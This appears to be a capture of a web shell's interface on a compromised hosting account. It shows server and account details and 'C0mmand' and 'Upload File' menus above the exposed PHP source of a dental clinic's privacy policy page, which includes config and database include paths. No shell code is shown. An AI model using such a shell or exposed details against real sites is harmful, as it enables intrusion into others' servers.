1Server IP : 217.21.90.164 / Your IP : 3.138.157.216 Web Server : LiteSpeed System : Linux in-mum-web840.main-hosting.eu 4.18.0-553.37.1.lve.el8.x86_64 #1 SMP Mon Feb 10 22:45:17 UTC 2025 x86_64 User : u367232671 ( 367232671) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u367232671/domains/zeropaindentist.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include dirname(__FILE__) . '/inc/config.php'; $TITLE = "Braces"; include dirname(__FILE__) . '/dbh/conn.php'; ?> <!doctype html> <html lang="en"> <head> <?php include dirname(__FILE__) . "/inc/hedaerlink.php";?> <meta name="robots" content="index, follow"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="manifest" href="visiontechnology.webmanifest"> <link rel="shortcut icon" type="image/x-icon" href="<?php echo $BASE_URL; ?>/img/logo/favicon.ico"> <link href="<?php echo $BASE_URL; ?>/css/bootstrap.min.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/common-variable.css" rel="stylesheet"> <link href="<?php echo $BASE_URL; ?>/css/style.css" rel="stylesheet"> <style> h1 { font-weight: bolder; margin-bottom: 8px; margin-top: 8px; color: #dc3545; } p { font-size: large; } </style> </head> <body> <?php $ServiceCosmetic_page = 'active'; include dirname(__FILE__) . '/inc/nav.php';?> <div class="container"> <img src="./img/slider/banner01.png" class='w-100' alt=""> <h1>Privacy Policy</h1> <p> ZeroPain Dentist is committed to safeguarding and preserving the privacy of our visitors. <br><br> This Privacy Policy describes what happens to any personal data that you provide to us, or that we collect from you whilst you visit our site. We do update this Policy from time to time, so please do review this Policy periodically.</p> <h1>Information We Collect</h1> <p>In running or maintaining our website, we may gather and process the following data about you: <br><br> Information about your use of our site, including details of your visits such as pages viewed and the resources that you access. Such information includes traffic data, location data and other communication data. <br><br> Information provided voluntarily by you. For example, when you register for information or make a purchase. <br><br> Information that you provide when you communicate with us by any means. </p> <h1>Use Of Cookies</h1> <p> Cookies provide information about the computer used by a visitor. We may use cookies where appropriate to gather information about your computer fin order to help us in improving our website. <br><br> We may gather information about your general internet use by using the cookie. Where used, these cookies are downloaded to your computer and stored on the computer’s hard drive. It is statistical data which does not <br><br> identify any personal details whatsoever. You can adjust the settings on your computer to decline any cookies if you wish. Our advertisers may also use cookies, over which we have no control. Such cookies would be <br><br> downloaded once you click on advertisements on our website. </p> <h1>Use Of Your Information</h1> <p>We use the information that we collect from you to provide our services to you. In addition to this, we may use the information for one or more of the following purposes: <br><br> To provide information to you that you request from us relating to our products or services. <br><br> To provide information to you relating to other products that you may be interested in. Such additional information will only be provided where you have consented to receive such information. To inform you of any modifications to our website, services or goods and products.</p> If you have previously purchased any services from us, we may provide you with details of similar services, or other goods and services that you may be interested in. <h1>Storing Your Personal Data</h1> <p></p> <br><br> occasion, such information can be prevented. We cannot guarantee the security of data that you choose to send us electronically, Sending such information is entirely at your own risk. </p> <h1>Disclosing Your Information</h1> We will not disclose your personal information to any other party. </div> <?php include dirname(__FILE__) . '/inc/footer.php';?> <script src="<?php echo $BASE_URL; ?>/js/bootstrap.bundle.min.js"></script> <script src="<?php echo $BASE_URL; ?>/js/fontawsome.js"></script> <script src="<?php echo $BASE_URL; ?>/js/main.js"></script> </body> </html>